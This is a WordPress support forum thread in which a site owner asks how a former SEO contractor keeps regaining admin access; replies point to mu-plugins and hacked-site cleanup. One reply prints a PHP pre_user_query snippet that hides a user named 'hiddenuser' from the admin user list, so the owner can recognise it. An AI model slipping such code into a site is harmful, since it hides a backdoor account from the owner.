Support » Fixing WordPress » SEO company gaining unauthorised access

  • etiennette

    (@etiennette)


    Hi,

    I was hoping you might be able to help. We used a SEO company for a while but then decided that we did not want to continue their services. We advised them and cancelled within the agreement terms.

    The issue is that even though we have at various times: deleted their user login, changed passwords, changed their user type to subscriber only, and changed FTP passwords
    They are somehow able to reinstate their user account, regain access, or change their user type to editor and schedule new posts.

    I cannot work out how they are doing this, and have deleted all inactive plugins, gone through to see if there was a plugin that was granting access, etc.

    How can I block them from accessing the dashboard (or maybe they are posting remotely?) as they keep sending invoices for the “work” that they have done, even though we have advised them many times that we have cancelled and will not pay for the unauthorised “work”.

    Is there a back-door that they are using to gain access???

    Thanks, I hope you can help me with a solution to this problem!

    • This topic was modified 2 years ago by t-p.

    The page I need help with: [log in to see the link]

Viewing 5 replies - 1 through 5 (of 5 total)
  • Moderator t-p

    (@t-p)

    This is not a support topic — it has nothing to do with WordPress core.

    It’s strictly between you and and your SEO company.

    ritzonline

    (@ritzonline)

    you have to check your PHP function there are invisible user hiding there code you have to delete that in your php function in your theme, so anytime they can access your admin..

    etiennette

    (@etiennette)

    @t-p Thanks, yes I realise that this is not specifically a wordpress issue, I just didn’t know where to post this issue. I’m sorry if this was not permitted.

    Thank you @ritzonline
    Would you be able to give any more guidance on what I should look for in the functions.php file? Would there be anything that would make this stand out?
    Sorry, I had a look already but I am not really sure what I am looking for…

    Thanks!

    Moderator Steve Stern

    (@sterndata)

    Support Team Volunteer

    Check the director wp_content/mu-plugins to see if, perhaps, they installed a “must use” plugin that gives them access.

    If not, treat your site as though it’s been hacked.

    Get a fresh cup of coffee, take a deep breath and carefully follow this guide. When you’re done, you may want to implement some (if not all) of the recommended security measures.

    If you’re unable to clean your site(s) successfully, there are reputable organizations that can clean your sites for you. Sucuri and Wordfence are a couple.

    ritzonline

    (@ritzonline)

    here find this similar code in php function add_action(‘pre_user_query’,’yoursite_pre_user_query’);
    function yoursite_pre_user_query($user_search) {
    global $current_user;
    $username = $current_user->user_login;

    if ($username != ‘hiddenuser’) {
    global $wpdb;
    $user_search->query_where = str_replace(‘WHERE 1=1’,
    “WHERE 1=1 AND {$wpdb->users}.user_login != ‘hiddenuser'”,$user_search->query_where);
    }
    }

Viewing 5 replies - 1 through 5 (of 5 total)
  • The topic ‘SEO company gaining unauthorised access’ is closed to new replies.